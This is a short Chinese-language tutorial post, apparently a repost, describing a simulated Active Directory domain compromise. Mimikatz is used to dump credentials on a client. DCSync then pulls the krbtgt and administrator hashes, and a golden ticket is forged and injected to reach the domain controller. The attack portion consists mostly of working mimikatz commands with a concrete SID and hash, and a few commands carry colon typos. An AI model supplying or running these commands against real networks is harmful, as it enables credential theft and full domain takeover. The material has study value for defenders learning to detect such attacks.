域滲透之通過DCSync獲取權限並制作黃金票據


環境背景


  • 賬號:

    • admin 沒有域管權限
    • admin02 有域管權限
    • administrator 有域管權限
  • 模擬滲透過程:

利用任意方法已經登錄到client1(Windows 7),在client1上獲取到了admin02的權限,進行DCSync獲取krbtgt的hash,制作黃金票據,並遠程IPC訪問域控Windows Server 2012


登錄Client1抓取域管憑證



嘗試dcsync

嘗試獲取域管權限

嘗試在本機上與mimikatz抓取這個組內的成員的hash

privilege::debug
sekurlsa::logonpasswords


切換到admin02執行DCSync

lsadump:dcsync /user:krbtgt /domain:sec.com
lsadump:dcsync /user:administrator /domain:sec.com


制作使用黃金票據


kerberos::golden /user:administrator /domain:sec.com /sid:s-1-5-21-2824519120-46247909-3994855717-500 /krbtgt:251ebdd7727334d9ade0415bf79d255a /ticket:super.ticket
kerberos:ptt super.ticket



免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM